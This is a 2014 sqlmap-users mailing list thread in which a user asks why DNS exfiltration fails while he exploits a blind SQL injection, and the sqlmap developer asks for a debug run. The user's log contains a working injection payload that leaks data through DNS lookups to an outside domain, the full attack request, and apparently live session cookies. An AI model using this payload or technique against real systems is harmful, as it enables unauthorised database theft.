Hi Chris.
It looks quite right. It would be tremendously helpful if you could send a
console output and a tcpdump (you can limit to only port 53) for a
following run:
sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..."
>From your given description it looks like everything should be up and
running.
Kind regards,
Miroslav Stampar
On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccleme...@outlook.com>wrote:
> Hey all,
>
> I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit
> and am trying to get dns exfil to work, but am not having any luck.
>
> I start sqlmap as root with the —dns-domain option set to a domain that I
> control and have the sqlmap machine set as the authoritative NS for.
> Running with a -v6, this is the info I get:
>
> ===============================================
> [18:22:18] [INFO] testing for data retrieval through DNS channel
> [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT
> LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS
> CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)--
> PyBa
> [18:22:18] [TRAFFIC OUT] HTTP request [#3]:
> GET
> /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
> HTTP/1.1
> Accept-language: en-us,en;q=0.5
> Accept-encoding: gzip,deflate
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1)
> Gecko/2008071719 Firefox/3.0.1
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Cookie:
> Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec
> Connection: close
>
> [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK):
> Content-length: 8627
> Content-encoding: gzip
> Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/;
> httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/;
> httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu,
> 22-Jan-2015 23:22:20 GMT; path=/; httponly
> Expires: Mon, 1 Jan 2001 00:00:00 GMT
> Vary: Accept-Encoding
> Uri:
> https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
> Server: Apache
> Last-modified: Wed, 22 Jan 2014 23:22:20 GMT
> Connection: close
> Pragma: no-cache
> Cache-control: post-check=0, pre-check=0
> Date: Wed, 22 Jan 2014 23:22:20 GMT
> P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
> Content-type: text/html; charset=utf-8
>
> [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds
> [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off
> DNS exfiltration support
> ===============================================
>
> If I run a tcpdump on the sqlmap machine, I see dns requests come in for “
> target.net” and if I do manual dns queries to the domain I own, sqlmap
> responds as expected with localhost.domain.com.
>
>
> Any idea? Am I doing anything wrong?
>
>
> Chris
>
>
>
> ------------------------------------------------------------------------------
> CenturyLink Cloud: The Leader in Enterprise Cloud Services.
> Learn Why More Businesses Are Choosing CenturyLink Cloud For
> Critical Workloads, Development Environments & Everything In Between.
> Get a Quote or Start a Free Trial Today.
>
> http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
CenturyLink Cloud: The Leader in Enterprise Cloud Services.
Learn Why More Businesses Are Choosing CenturyLink Cloud For
Critical Workloads, Development Environments & Everything In Between.
Get a Quote or Start a Free Trial Today.
http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
